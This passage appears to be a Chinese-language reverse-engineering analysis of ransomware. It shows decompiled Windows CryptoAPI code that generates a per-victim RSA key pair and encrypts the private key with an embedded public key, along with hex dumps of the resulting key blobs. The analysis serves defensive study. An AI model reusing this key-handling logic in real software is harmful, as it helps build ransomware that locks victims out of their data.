hProv = 0LL;
phKey = 0LL;
v2 = CryptAcquireContextW(&hProv, 0LL, 0LL, 1u, 0xF0000040);//初始化RSA加密对象
if ( !v2 )
goto LABEL_21;
v2 = CryptGenKey(hProv, 1u, 0x8000001u, &phKey); //生成RSA密钥对
if ( !v2 )
goto LABEL_21;
v2 = CryptExportKey(phKey, 0LL, 6u, 0, 0LL, &pdwDataLen);
if ( !v2 )
goto LABEL_21;
v3 = (char *)xmmword_7FF6BE683E58;
if ( pdwDataLen < (unsigned __int64)((_BYTE *)xmmword_7FF6BE683E58 - pbData) )
{
v4 = &pbData[pdwDataLen];
LABEL_10:
xmmword_7FF6BE683E58 = v4;
goto LABEL_11;
}
if ( pdwDataLen > (unsigned __int64)((_BYTE *)xmmword_7FF6BE683E58 - pbData) )
{
if ( pdwDataLen <= (unsigned __int64)((_BYTE *)*(&xmmword_7FF6BE683E58 + 1) - pbData) )
{
v5 = pdwDataLen - ((_BYTE *)xmmword_7FF6BE683E58 - pbData);
memset(xmmword_7FF6BE683E58, 0, v5);
v4 = (BYTE *)&v3[v5];
goto LABEL_10;
}
sub_7FF6BE635790((__int64)&pbData, pdwDataLen);
}
LABEL_11:
v2 = CryptExportKey(phKey, 0LL, 6u, 0, pbData, &pdwDataLen);
if ( v2 )
{
v2 = CryptExportKey(phKey, 0LL, 7u, 0, 0LL, &v10);
if ( v2 )
{
v6 = (char *)xmmword_7FF6BE683CE8;
if ( v10 < (unsigned __int64)((_BYTE *)xmmword_7FF6BE683CE8 - Src) )
{
v7 = &Src[v10];
LABEL_19:
xmmword_7FF6BE683CE8 = v7;
goto LABEL_20;
}
if ( v10 > (unsigned __int64)((_BYTE *)xmmword_7FF6BE683CE8 - Src) )
{
if ( v10 <= (unsigned __int64)((_BYTE *)*(&xmmword_7FF6BE683CE8 + 1) - Src) )
{
v8 = v10 - ((_BYTE *)xmmword_7FF6BE683CE8 - Src);
memset(xmmword_7FF6BE683CE8, 0, v8);
v7 = (BYTE *)&v6[v8];
goto LABEL_19;
}
sub_7FF6BE635790((__int64)&Src, v10);
}
LABEL_20:
v2 = CryptExportKey(phKey, 0LL, 7u, 0, Src, &v10);
}
}
LABEL_21:
if ( phKey )
CryptDestroyKey(phKey);
if ( hProv )
CryptReleaseContext(hProv, 0);
return v2;
}
生成的rsa公钥如下
0x06, 0x02, 0x00, 0x00, 0x00, 0xA4, 0x00, 0x00, 0x52, 0x53,
0x41, 0x31, 0x00, 0x08, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0x25, 0xA0, 0xB7, 0x91, 0x11, 0x08, 0x0D, 0xCE, 0x32, 0x95,
0xA8, 0x41, 0x00, 0xC6, 0x42, 0xC5, 0x50, 0x77, 0xE9, 0x90,
0x0A, 0x20, 0xA1, 0x2E, 0xDF, 0xA7, 0x4F, 0x4F, 0x9D, 0x26,
0xEC, 0xEE, 0xDA, 0x0D, 0x3C, 0x81, 0x53, 0x99, 0x77, 0xF3,
0xA5, 0xB3, 0x9E, 0xDA, 0xA5, 0xA9, 0x9E, 0x59, 0xE4, 0xB9,
0x8C, 0x9D, 0x67, 0xD3, 0x2C, 0x45, 0x74, 0x56, 0xA0, 0x53,
0xA4, 0x28, 0x41, 0xC4, 0x8D, 0xDD, 0x07, 0x52, 0xB8, 0x7E,
0x91, 0xF1, 0x2A, 0xE4, 0xDB, 0xD8, 0xFB, 0x04, 0x90, 0x8B,
0x42, 0x70, 0xAE, 0xC4, 0xA8, 0x21, 0x03, 0x92, 0xCD, 0x5E,
0xA0, 0x37, 0xCE, 0x83, 0xB2, 0x28, 0xDC, 0xF9, 0x0E, 0x3F,
0x27, 0x7D, 0x20, 0x0E, 0x38, 0x92, 0x7E, 0xCC, 0x97, 0xD4,
0x30, 0xA6, 0x7A, 0x10, 0x40, 0x87, 0xCE, 0xF0, 0x78, 0x51,
0x46, 0x16, 0xDD, 0x93, 0x71, 0xCC, 0xD2, 0x8D, 0xC5, 0x08,
0x99, 0xA8, 0x1B, 0x4B, 0x69, 0x01, 0xD9, 0xC2, 0xEF, 0xDC,
0x61, 0xF9, 0xFF, 0xCD, 0xF9, 0xC0, 0xAC, 0x76, 0x2F, 0xCD,
0x30, 0xD4, 0x67, 0xD9, 0x93, 0x6D, 0x2F, 0xC6, 0x92, 0x11,
0xFF, 0xC4, 0x98, 0x30, 0xA6, 0x3F, 0x54, 0xC0, 0x3E, 0x0D,
0xEF, 0x70, 0x47, 0xBE, 0x00, 0x42, 0x2A, 0x03, 0x11, 0x7D,
0xAC, 0xA8, 0xE6, 0x67, 0x88, 0x90, 0x10, 0xE4, 0xA0, 0x13,
0x84, 0x10, 0x3E, 0x66, 0x98, 0x7C, 0x24, 0x53, 0x24, 0xF3,
0x7E, 0xD2, 0x4B, 0xE6, 0xD7, 0x12, 0x1D, 0xD1, 0x01, 0x8B,
0xC1, 0x29, 0xA3, 0xDE, 0xC2, 0xF7, 0xCC, 0x56, 0x2D, 0x8E,
0x1E, 0xAC, 0xE7, 0x4B, 0xEE, 0xC6, 0xB7, 0x97, 0x1A, 0x5B,
0x01, 0x95, 0xF9, 0x76, 0x27, 0x5C, 0xE9, 0xDD, 0x61, 0x81,
0x55, 0x5A, 0xF6, 0x2D, 0x00, 0x5F, 0xB4, 0x59, 0x15, 0xF2,
0x65, 0xEE, 0x23, 0xB5, 0x97, 0xA2
生成的RSA私钥如下
0x07, 0x02, 0x00, 0x00, 0x00, 0xA4, 0x00, 0x00, 0x52, 0x53,
0x41, 0x32, 0x00, 0x08, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0x25, 0xA0, 0xB7, 0x91, 0x11, 0x08, 0x0D, 0xCE, 0x32, 0x95,
0xA8, 0x41, 0x00, 0xC6, 0x42, 0xC5, 0x50, 0x77, 0xE9, 0x90,
0x0A, 0x20, 0xA1, 0x2E, 0xDF, 0xA7, 0x4F, 0x4F, 0x9D, 0x26,
0xEC, 0xEE, 0xDA, 0x0D, 0x3C, 0x81, 0x53, 0x99, 0x77, 0xF3,
0xA5, 0xB3, 0x9E, 0xDA, 0xA5, 0xA9, 0x9E, 0x59, 0xE4, 0xB9,
0x8C, 0x9D, 0x67, 0xD3, 0x2C, 0x45, 0x74, 0x56, 0xA0, 0x53,
0xA4, 0x28, 0x41, 0xC4, 0x8D, 0xDD, 0x07, 0x52, 0xB8, 0x7E,
0x91, 0xF1, 0x2A, 0xE4, 0xDB, 0xD8, 0xFB, 0x04, 0x90, 0x8B,
0x42, 0x70, 0xAE, 0xC4, 0xA8, 0x21, 0x03, 0x92, 0xCD, 0x5E,
0xA0, 0x37, 0xCE, 0x83, 0xB2, 0x28, 0xDC, 0xF9, 0x0E, 0x3F,
0x27, 0x7D, 0x20, 0x0E, 0x38, 0x92, 0x7E, 0xCC, 0x97, 0xD4,
0x30, 0xA6, 0x7A, 0x10, 0x40, 0x87, 0xCE, 0xF0, 0x78, 0x51,
0x46, 0x16, 0xDD, 0x93, 0x71, 0xCC, 0xD2, 0x8D, 0xC5, 0x08,
0x99, 0xA8, 0x1B, 0x4B, 0x69, 0x01, 0xD9, 0xC2, 0xEF, 0xDC,
0x61, 0xF9, 0xFF, 0xCD, 0xF9, 0xC0, 0xAC, 0x76, 0x2F, 0xCD,
0x30, 0xD4, 0x67, 0xD9, 0x93, 0x6D, 0x2F, 0xC6, 0x92, 0x11,
0xFF, 0xC4, 0x98, 0x30, 0xA6, 0x3F, 0x54, 0xC0, 0x3E, 0x0D,
0xEF, 0x70, 0x47, 0xBE, 0x00, 0x42, 0x2A, 0x03, 0x11, 0x7D,
0xAC, 0xA8, 0xE6, 0x67, 0x88, 0x90, 0x10, 0xE4, 0xA0, 0x13,
0x84, 0x10, 0x3E, 0x66, 0x98, 0x7C, 0x24, 0x53, 0x24, 0xF3,
0x7E, 0xD2, 0x4B, 0xE6, 0xD7, 0x12, 0x1D, 0xD1, 0x01, 0x8B,
0xC1, 0x29, 0xA3, 0xDE, 0xC2, 0xF7, 0xCC, 0x56, 0x2D, 0x8E,
0x1E, 0xAC, 0xE7, 0x4B, 0xEE, 0xC6, 0xB7, 0x97, 0x1A, 0x5B,
0x01, 0x95, 0xF9, 0x76, 0x27, 0x5C, 0xE9, 0xDD, 0x61, 0x81,
0x55, 0x5A, 0xF6, 0x2D, 0x00, 0x5F, 0xB4, 0x59, 0x15, 0xF2,
0x65, 0xEE, 0x23, 0xB5, 0x97, 0xA2, 0xD3, 0xD4, 0xC7, 0x03,
0xD0, 0xF9, 0xA0, 0x8D, 0xB7, 0x11, 0x01, 0xE4, 0x40, 0x31,
0xCA, 0x2A, 0x84, 0x49, 0x0F, 0x50, 0x52, 0x75, 0x86, 0x36,
0x5F, 0x1E, 0x92, 0xD1, 0xD6, 0x6A, 0x43, 0x8B, 0xC3, 0x35,
0x20, 0xAC, 0x31, 0x1D, 0xFC, 0xB6, 0xB6, 0x2B, 0xAE, 0xD2,
0x3B, 0x97, 0xBA, 0x08, 0xD2, 0x35, 0x93, 0x57, 0x49, 0x31,
0x44, 0xE6, 0x08, 0xCF, 0x4F, 0xA4, 0x60, 0xFD, 0x5C, 0xF7,
0x0B, 0xAA, 0x6A, 0x90, 0x96, 0xFC, 0x0B, 0x9F, 0xF7, 0x71,
0x35, 0xAC, 0x1C, 0x89, 0xA6, 0x0E, 0xE3, 0x86, 0xFF, 0x01,
0x35, 0x03, 0x3A, 0x2A, 0x21, 0x08, 0x40, 0x2F, 0xEC, 0xE4,
0xD2, 0x8E, 0x2F, 0x5B, 0x9C, 0xA2, 0xA5, 0x69, 0x90, 0x7C,
0x32, 0x4F, 0xDE, 0x8A, 0x8F, 0xB7, 0xA6, 0x72, 0xE6, 0x3B,
0x7A, 0xE1, 0xE0, 0x2D, 0x16, 0xD6, 0x2E, 0x25, 0xB5, 0x37,
0x60, 0x98, 0x31, 0xCE, 0x27, 0x7C, 0x10, 0xC2, 0xBD, 0x64,
0x4A, 0xF1, 0x88, 0x49, 0x82, 0xC0, 0x17, 0xE6, 0x3D, 0x29,
0x8A, 0x59, 0x58, 0xB4, 0xE5, 0xC3, 0x36, 0xE8, 0x22, 0x5D,
0xD1, 0x63, 0xB3, 0x19, 0x7B, 0x98, 0x90, 0xDB, 0xA3, 0x44,
0x3D, 0x10, 0x4F, 0xE4, 0x2A, 0x61, 0x4B, 0xCD, 0x72, 0xAB,
0xCF, 0x94, 0x4E, 0x75, 0x88, 0xC7, 0x92, 0x49, 0xF5, 0xE6,
0x9C, 0xFB, 0x87, 0x23, 0x0D, 0x2C, 0xBF, 0xDF, 0xDC, 0x2B,
0x5E, 0xA5, 0x80, 0xC6, 0x83, 0x04, 0x6D, 0x20, 0x05, 0x3C,
0x92, 0x28, 0x35, 0x75, 0x86, 0x3B, 0x25, 0x46, 0xBB, 0x31,
0x7C, 0xF2, 0xB4, 0x7D, 0x21, 0x91, 0x9B, 0x9F, 0x7C, 0x92,
0xC5, 0x6D, 0xDC, 0x3C, 0xE7, 0xA2, 0x75, 0xEA, 0x5F, 0x24,
0x15, 0x81, 0x02, 0x8E, 0xE6, 0xA0, 0xCA, 0xD0, 0x72, 0x79,
0xFD, 0x67, 0x1E, 0x83, 0xD3, 0x01, 0xEC, 0x88, 0xF4, 0xF2,
0xDD, 0xC9, 0x59, 0xE0, 0x53, 0x5E, 0xFC, 0x9E, 0xFA, 0xF7,
0xD7, 0x16, 0x27, 0x9B, 0xC1, 0x1A, 0xA3, 0xF1, 0xE1, 0x4D,
0xDD, 0xDA, 0xF0, 0x76, 0x6C, 0x4D, 0x2C, 0x59, 0xCC, 0x6C,
0x44, 0x86, 0x53, 0x49, 0xD4, 0xC2, 0x58, 0xA9, 0x70, 0xC4,
0xE3, 0xE5, 0x9D, 0x16, 0x3E, 0x6C, 0xDA, 0xCA, 0xE9, 0x74,
0xA8, 0x3F, 0xB6, 0x55, 0x81, 0x57, 0x23, 0x37, 0x47, 0xA0,
0x51, 0x49, 0x0E, 0xEA, 0x14, 0x10, 0x57, 0xAF, 0x68, 0x9A,
0x3E, 0x20, 0x1A, 0x60, 0x23, 0x92, 0x04, 0xDE, 0x9C, 0xD4,
0xE7, 0x4B, 0x4B, 0x80, 0x8C, 0xA5, 0x11, 0x35, 0x2C, 0xF1,
0x6C, 0xB1, 0x3C, 0x9D, 0x5C, 0xB1, 0xC1, 0x3E, 0xD1, 0x98,
0x71, 0xDF, 0xCF, 0x6B, 0x84, 0x82, 0xBC, 0x87, 0xD1, 0xFA,
0x86, 0xA5, 0xC5, 0x56, 0x93, 0x63, 0x1A, 0x9F, 0xEC, 0xB3,
0xD9, 0xBB, 0x98, 0x65, 0x2F, 0xAC, 0xD2, 0x24, 0x59, 0xC2,
0x3D, 0x83, 0x7A, 0xC3, 0xB5, 0x60, 0xF2, 0x45, 0x62, 0x13,
0x2B, 0x4A, 0x15, 0x2D, 0x62, 0x04, 0xE4, 0x81, 0x00, 0xF1,
0x8C, 0x55, 0xD1, 0x78, 0xAD, 0x0E, 0x31, 0x47, 0xC6, 0x5F,
0x84, 0x2E, 0x00, 0x94, 0x71, 0x9C, 0x13, 0xB2, 0xB8, 0x6E,
0x52, 0x5C, 0x62, 0xD4, 0x12, 0x98, 0xD9, 0x83, 0x2E, 0xAF,
0x21, 0x1E, 0xF9, 0xAC, 0xF6, 0xE1, 0xFA, 0xAF, 0x59, 0xFE,
0x55, 0x29, 0x67, 0x4C, 0xC8, 0x0C, 0x75, 0x11, 0x42, 0x8A,
0x6B, 0xA7, 0x00, 0xDA, 0xF7, 0x4E, 0x1A, 0x53, 0x6C, 0x63,
0x84, 0x8A, 0xF2, 0xC3, 0xEC, 0x62, 0xE3, 0x6D, 0x33, 0x55,
0x82, 0x16, 0xFE, 0xC8, 0x76, 0x79, 0x8A, 0x2C, 0x26, 0x43,
0xBF, 0xCA, 0x8C, 0xBF, 0x77, 0x7E, 0xE9, 0xB8, 0xBC, 0xB4,
0x28, 0xB6, 0xAD, 0xF6, 0x5B, 0x43, 0x85, 0xA8, 0x62, 0x12,
0xF9, 0x27, 0x92, 0xC9, 0x52, 0x66, 0x34, 0x5B, 0x60, 0xA2,
0x7F, 0x57, 0xC1, 0x2A, 0x30, 0xCD, 0x81, 0xA6, 0x1E, 0x3C,
0x03, 0x39, 0x87, 0x96, 0x9D, 0x31, 0xD4, 0x07, 0xCA, 0xF3,
0x91, 0x97, 0xDF, 0x1C, 0x2F, 0xA3, 0xC4, 0xAE, 0x62, 0x7C,
0x7B, 0x9D, 0x18, 0x14, 0x11, 0xDA, 0x5D, 0x0E, 0xF8, 0xB1,
0x14, 0x92, 0xCA, 0xBC, 0x60, 0xE5, 0x6B, 0x15, 0xBA, 0x93,
0xDD, 0xB3, 0xA5, 0x72, 0xB2, 0x3A, 0x5E, 0xB9, 0x79, 0x5C,
0xAA, 0x8E, 0xDC, 0xFA, 0x94, 0xA5, 0x09, 0x09, 0x27, 0xF0,
0x0B, 0x8E, 0x65, 0x18, 0x57, 0x4D, 0x3F, 0x67, 0x02, 0x81,
0xE2, 0xE6, 0x65, 0x00, 0xC0, 0xF5, 0xEF, 0xB1, 0xA5, 0x39,
0xC6, 0x68, 0x24, 0xAA, 0xB1, 0x32, 0xB0, 0x2F, 0x0D, 0x35,
0x6C, 0x90, 0xB3, 0x0E, 0x2F, 0xE0, 0x59, 0xF1, 0x6F, 0x0C,
0xD5, 0x38, 0x66, 0x3D, 0xFC, 0x32, 0x2A, 0xC8, 0x8F, 0x51,
0x91, 0x3E, 0xCD, 0x30, 0xD1, 0x8C, 0x3D, 0xAB, 0x77, 0x16,
0xAE, 0x74, 0xCE, 0xB4, 0x5C, 0x91, 0xDB, 0xBA, 0xD3, 0x52,
0xAE, 0xCA, 0x38, 0x3B, 0x3C, 0x3E, 0x51, 0xC2, 0x06, 0xAD,
0xF9, 0x1E, 0x2F, 0x3A, 0x8D, 0xEF, 0x2D, 0x1C, 0x96, 0x4B,
0x56, 0xE6, 0x52, 0x3D, 0x33, 0x68, 0x13, 0x26, 0xB4, 0xE4,
0x36, 0x68, 0xD9, 0x23, 0xC6, 0x2A, 0x30, 0xC6, 0x91, 0x88,
0x9C, 0xF0, 0xBA, 0xBD, 0x47, 0xA6, 0x50, 0x79, 0x06, 0xE0,
0xED, 0x10, 0x25, 0x72, 0xEA, 0x72, 0xD5, 0x98, 0x0B, 0xBD,
0xA3, 0x5B, 0x04, 0x21, 0x35, 0x91, 0xB0, 0x5B, 0x4A, 0xB0,
0x28, 0x57, 0x4E, 0xDF, 0x7C, 0x3A, 0x4C, 0x65, 0x1A, 0x82,
0x63, 0x33, 0x34, 0x90, 0xCF, 0x1F, 0xB2, 0x21, 0x25, 0x25,
0xED, 0x7F, 0x22, 0x12, 0x0F, 0xF9, 0xBA, 0x75, 0x2A, 0x13,
0xBC, 0x3A, 0xA0, 0x1D, 0x49, 0xD4, 0xC9, 0x23, 0x70, 0x03,
0x57, 0x33, 0x41, 0x50, 0x32, 0xB3, 0x80, 0x55, 0xA2, 0x54,
0xE1, 0x61, 0xB5, 0x1B, 0x7B, 0xD1, 0xC6, 0x1F, 0xE6, 0x55,
0x58, 0xA9, 0xD9, 0xCC, 0xDA, 0x6F, 0xA4, 0xB8, 0x7D, 0xE3,
0x21, 0x65, 0x20, 0xFC, 0x00, 0x93, 0x4E, 0xE2, 0x11, 0x0B,
0xBE, 0xCD, 0xA4, 0x13, 0xEF, 0x28, 0x5A, 0x3F, 0x4A, 0xE7,
0x09, 0x7C, 0x54, 0x3D, 0x30, 0x71, 0xAD, 0x8B, 0x45, 0x7E,
0xBA, 0x81, 0x2B, 0xE2, 0x22, 0x78, 0x87, 0xD1, 0x6D, 0x67,
0x4D, 0x5D, 0xA2, 0x23, 0x45, 0x7B, 0x0C, 0x68, 0x94, 0xFD,
0x20, 0x82, 0xC4, 0x07, 0x09, 0x9E, 0x14, 0x74, 0xBE, 0xD1,
0x05, 0xC7, 0x7B, 0xA3, 0x8E, 0xCB, 0xEF, 0x6F, 0xBB, 0x3A,
0x13, 0x82, 0x78, 0xAB, 0x49, 0xC1, 0xBA, 0x60, 0xB8, 0xD9,
0x97, 0xC1, 0x41, 0x68, 0x0C, 0x71, 0x1C, 0x52, 0xCF, 0x8A,
0x71, 0xCA, 0x5A, 0x12, 0x9C, 0x43, 0xE3, 0xD1, 0x13, 0xA2,
0xF8, 0x07
对刚刚生成的RSA私钥进行加密
v4 = 0LL;
phProv = 0LL;
hKey = 0LL;
v5 = 0;
pbData = 0;
pdwDataLen = 4;
KeyParam = CryptAcquireContextW(&phProv, 0LL, 0LL, 1u, 0xF0000040);//初始化RSA加密对象
if ( KeyParam )
{
KeyParam = CryptImportKey(phProv, *(const BYTE **)a1, *(_DWORD *)(a1 + 8) - *(_DWORD *)a1, 0LL, 0, &hKey);//导入配置文件中的RSA公钥
if ( KeyParam )
{
KeyParam = CryptGetKeyParam(hKey, 8u, (BYTE *)&pbData, &pdwDataLen, 0);
if ( KeyParam )
{
v7 = pbData >> 3 == 11;
v8 = (pbData >> 3) - 11;
pbData = v8;
v9 = v8;
v10 = 0LL;
v25 = 0LL;
v11 = 0LL;
v26 = 0LL;
v27 = 0LL;
if ( !v7 )
{
alloc_memory(&v25, v8);
v10 = (char *)v25;
memset(v25, 0, (unsigned int)v9);
v11 = &v10[v9];
v26 = &v10[v9];
v8 = pbData;
v4 = v27;
}
v28 = 0LL;
v29 = 0LL;
v12 = 0LL;
while ( 1 )
{
v13 = *a2;
v14 = a2[1] - *a2;
if ( v8 >= (unsigned __int64)(v14 - v12) )
v8 = v14 - v5;
v20 = v8;
memcpy(v10, (const void *)(v12 + v13), v8);
v21 = v20 + v5;
v15 = a2[1] - *a2;
v12 = v21;
pdwDataLen = v20;
Final = v21 == v15;
KeyParam = CryptEncrypt(hKey, 0LL, Final, 0, 0LL, &pdwDataLen, 0);
if ( !KeyParam )
break;
if ( pdwDataLen > (unsigned __int64)(v11 - v10) )
{
if ( pdwDataLen <= (unsigned __int64)(v4 - (_QWORD)v10) )
{
v16 = pdwDataLen - (v11 - v10);
memset(v11, 0, v16);
v11 += v16;
v26 = v11;
}
else
{
sub_7FF6BE635790((__int64)&v25, pdwDataLen);
v4 = v27;
v11 = v26;
v10 = (char *)v25;
}
}
KeyParam = CryptEncrypt(hKey, 0LL, Final, 0, (BYTE *)v10, &v20, (_DWORD)v11 - (_DWORD)v10);//加密生成的RSA的私钥
if ( !KeyParam )
break;
sub_7FF6BE635550(&v28, *((_QWORD *)&v28 + 1), v10, v20);
if ( v12 == v15 )
break;
v8 = pbData;
v5 = v21;
}
sub_7FF6BE635410(a2, &v28);
v17 = (void *)v28;
if ( (_QWORD)v28 )
{
if ( (unsigned __int64)(v29 - v28) >= 0x1000 )
{
v17 = *(void **)(v28 - 8);
if ( (unsigned __int64)(v28 - (_QWORD)v17 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v17);
}
if ( v10 )
{
v18 = v10;
if ( (unsigned __int64)(v4 - (_QWORD)v10) >= 0x1000 )
{
v10 = (char *)*((_QWORD *)v10 - 1);
if ( (unsigned __int64)(v18 - v10 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v10);
}
}
}
}
if ( hKey )//清理资源
CryptDestroyKey(hKey);
if ( phProv )
CryptReleaseContext(phProv, 0);
return KeyParam;
}
加密RSA私钥后的数据如下
0xAB, 0xC5, 0x2C, 0x3B, 0xB0, 0x34, 0x53, 0x61, 0xCB, 0x3B,
0xC5, 0x39, 0x58, 0xEA, 0xA0, 0x14, 0x17, 0x4A, 0x8C, 0x25,
0x44, 0x8D, 0x57, 0xA8, 0xDF, 0xB9, 0x88, 0xAD, 0x64, 0x7C,
0x5D, 0xD0, 0x3B, 0x5C, 0x42, 0xCB, 0xCC, 0x84, 0xEA, 0xF1,
0x8B, 0x4E, 0x72, 0x50, 0xAF, 0x40, 0xB1, 0x60, 0xCF, 0x6C,
0x21, 0xA5, 0xBD, 0xC5, 0xB9, 0xE9, 0xAC, 0x2E, 0x10, 0xA9,
0x3C, 0x46, 0x39, 0xAB, 0x80, 0xC4, 0x9F, 0x4D, 0x49, 0x26,
0x9E, 0x80, 0xC9, 0x6E, 0xC1, 0xA8, 0x8D, 0xFC, 0x39, 0x05,
0xCC, 0x8A, 0x37, 0xF1, 0x8E, 0x0E, 0x06, 0x6C, 0x79, 0x13,
0x30, 0x7A, 0xEE, 0x16, 0x9D, 0x51, 0x6A, 0xBA, 0x22, 0x61,
0x59, 0x7B, 0xC5, 0x7C, 0xB9, 0xB7, 0x74, 0x65, 0xA9, 0xBF,
0xE5, 0x7F, 0x9C, 0x97, 0xFF, 0x93, 0x43, 0x44, 0x82, 0x37,
0xFD, 0x67, 0xB6, 0x44, 0x6C, 0x1E, 0x71, 0x5C, 0x55, 0x12,
0xE5, 0xA8, 0xB5, 0x53, 0xD0, 0x77, 0xE6, 0x27, 0x3C, 0x10,
0xCD, 0x86, 0x7A, 0xF3, 0x50, 0x55, 0x02, 0x79, 0xAA, 0xAA,
0xBF, 0xA1, 0xE8, 0x7A, 0xC9, 0xC7, 0x1B, 0x25, 0xFF, 0xC9,
0x61, 0x30, 0x94, 0x45, 0x21, 0xC9, 0x71, 0xAB, 0xE3, 0xE5,
0x3E, 0xF5, 0x25, 0x9A, 0x4A, 0x22, 0x62, 0x02, 0x9A, 0xF8,
0x5B, 0xCB, 0xAF, 0x47, 0x9F, 0x85, 0x4C, 0x71, 0x17, 0x84,
0xC1, 0x08, 0xA1, 0x6B, 0xD2, 0x61, 0x92, 0xF0, 0x70, 0xB2,
0xCE, 0xE7, 0x1C, 0xE1, 0x90, 0xD7, 0x2A, 0xDC, 0xC2, 0xE5,
0x7A, 0xFF, 0x6B, 0x0B, 0x08, 0x0B, 0x12, 0x21, 0x33, 0x60,
0xDC, 0x0B, 0x15, 0xB0, 0x9E, 0x78, 0x88, 0x08, 0xC4, 0x63,
0x5D, 0x39, 0xFD, 0xBD, 0x92, 0x04, 0x85, 0x86, 0xC1, 0x63,
0x20, 0xF1, 0x42, 0x6C, 0x1A, 0xA2, 0xBB, 0x5A, 0xBB, 0x0D,
0x3C, 0xD1, 0x1F, 0xAE, 0x69, 0x37, 0x04, 0x61, 0x1D, 0x3D,
0x81, 0xD5, 0x56, 0x3F, 0x8C, 0x33, 0xB9, 0x48, 0xEE, 0xC2,
0x0A, 0x0B, 0x50, 0xEB, 0x6B, 0x29, 0x32, 0xDF, 0x19, 0x27,
0x2E, 0x7B, 0x90, 0x64, 0x58, 0x47, 0xBA, 0x58, 0x64, 0x4F,
0x01, 0x79, 0x20, 0xBE, 0xC9, 0x88, 0x1D, 0x92, 0x6A, 0x2D,
0x3D, 0x1A, 0x3D, 0x08, 0x3F, 0x20, 0x9F, 0x4F, 0x9A, 0x36,
0x4C, 0x4B, 0xED, 0x37, 0xD9, 0x01, 0x9B, 0xCC, 0x48, 0x9E,
0xFE, 0x02, 0xA9, 0x58, 0x39, 0xB7, 0x6D, 0x1E, 0xB4, 0x6A,
0xAB, 0x54, 0x51, 0x61, 0x75, 0x82, 0xF2, 0x82, 0x9B, 0xCE,
0x6A, 0xEF, 0x99, 0x64, 0xD4, 0x1D, 0x01, 0x7C, 0x31, 0x65,
0x52, 0xD7, 0xFB, 0x1B, 0x87, 0xF3, 0x76, 0xB3, 0x21, 0xB1,
0x91, 0x51, 0xA1, 0xF2, 0x87, 0x4A, 0x9A, 0xFC, 0x3E, 0xFD,
0xAC, 0x91, 0x66, 0x08, 0x17, 0x96, 0x18, 0x12, 0x82, 0x4E,
0x8A, 0x38, 0x6C, 0x9E, 0xC2, 0x7C, 0xD2, 0x6C, 0x4F, 0xFA,
0x5F, 0x2A, 0xC9, 0x01, 0x67, 0xE2, 0x91, 0x55, 0x7B, 0x50,
0x93, 0x74, 0xDA, 0x1B, 0xFF, 0x2F, 0xA4, 0x31, 0x06, 0xA6,
0xA4, 0x6F, 0x39, 0x5B, 0xDF, 0x36, 0xAB, 0xEC, 0x3D, 0x4D,
0xB8, 0xC4, 0x17, 0x8D, 0x85, 0x21, 0x6A, 0x9C, 0x33, 0xC2,
0x0F, 0x30, 0xB3, 0x94, 0x55, 0xB6, 0x20, 0x7F, 0xA1, 0x5A,
0x0F, 0xF3, 0x0B, 0x1A, 0x3B, 0xF1, 0xE1, 0xCA, 0x5A, 0x39,
0x4B, 0x0E, 0x2D, 0xB6, 0x6B, 0x83, 0xB1, 0xAF, 0x7B, 0x6A,
0x21, 0x73, 0x28, 0x59, 0xAE, 0x65, 0x54, 0xC0, 0x6A, 0x91,
0x80, 0x31, 0xD1, 0xF3, 0x54, 0x3F, 0x25, 0x75, 0x1B, 0x6B,
0x1E, 0x1F, 0x07, 0xFB, 0x99, 0xEC, 0xBA, 0x28, 0xF3, 0x72,
0xEF, 0x78, 0x2D, 0x9D, 0xA6, 0xA4, 0x77, 0x3C, 0x4C, 0xE5,
0x2C, 0x96, 0xF4, 0x6C, 0x98, 0x55, 0x77, 0x0D, 0x17, 0x50,
0x61, 0x16, 0xD4, 0x67, 0x5D, 0xA7, 0xAF, 0x7A, 0xDF, 0x5E,
0xF5, 0xD5, 0x61, 0x23, 0x6B, 0x86, 0x29, 0x83, 0x56, 0xF6,
0xA8, 0xA6, 0xFC, 0x46, 0x0D, 0x93, 0x38, 0x32, 0x7A, 0x11,
0x16, 0xDC, 0x15, 0x89, 0xA2, 0xA9, 0xA1, 0xE0, 0x7B, 0xAB,
0xDE, 0xEF, 0x52, 0x35, 0xCA, 0x1C, 0x1F, 0xCD, 0x73, 0x78,
0xD1, 0xF4, 0x43, 0xA1, 0x12, 0xDA, 0xE9, 0x7C, 0x8D, 0x91,
0xBB, 0x6E, 0xE9, 0x3A, 0x58, 0x05, 0x7A, 0x84, 0xA1, 0x97,
0x0C, 0xBB, 0x7F, 0x4B, 0x2E, 0x41, 0xAB, 0x03, 0xFE, 0x75,
0x61, 0x6D, 0xD7, 0xF0, 0x1E, 0x63, 0x26, 0x28, 0x6F, 0x4F,
0xDD, 0x0F, 0x19, 0xAD, 0xDE, 0xFE, 0xF8, 0xDC, 0x93, 0xD6,
0x83, 0x21, 0x10, 0xED, 0xC6, 0x21, 0xBA, 0x4F, 0xFC, 0x06,
0x55, 0x69, 0x93, 0x49, 0xDC, 0x8B, 0xC1, 0x9B, 0x01, 0xDF,
0xF6, 0xFB, 0x10, 0x3E, 0xD7, 0xEA, 0x35, 0xAB, 0xC2, 0x59,
0xC9, 0x30, 0x2B, 0xD8, 0xC5, 0xAA, 0x69, 0xCE, 0x2D, 0x0D,
0x0B, 0xAF, 0xBD, 0xD0, 0xCC, 0xEF, 0xEB, 0xDD, 0x30, 0x53,
0xF5, 0x1A, 0x47, 0xA8, 0xAA, 0x27, 0x22, 0xE3, 0x89, 0x2B,
0xAE, 0x8B, 0xC7, 0x99, 0x1D, 0x78, 0x10, 0xA5, 0xFF, 0x0A,
0x10, 0xCA, 0x52, 0xEB, 0xBE, 0x73, 0xCF, 0x89, 0x4F, 0x6E,
0x6E, 0x98, 0xF1, 0x7F, 0x10, 0x12, 0x84, 0x27, 0x7B, 0x9E,
0x3D, 0x0E, 0x03, 0xEB, 0xE2, 0x09, 0x01, 0xB2, 0x58, 0x83,
0x18, 0x77, 0x89, 0xA9, 0xE9, 0x3C, 0xD9, 0x61, 0x55, 0xA6,
0xBF, 0xC6, 0xAB, 0x10, 0xD6, 0x92, 0x9B, 0x25, 0x1F, 0x00,
0xA1, 0x0F, 0xDE, 0x62, 0xE6, 0x20, 0x56, 0xC7, 0xD5, 0xC9,
0x47, 0x23, 0x3E, 0x0F, 0xCB, 0x83, 0x66, 0xB2, 0x30, 0x75,
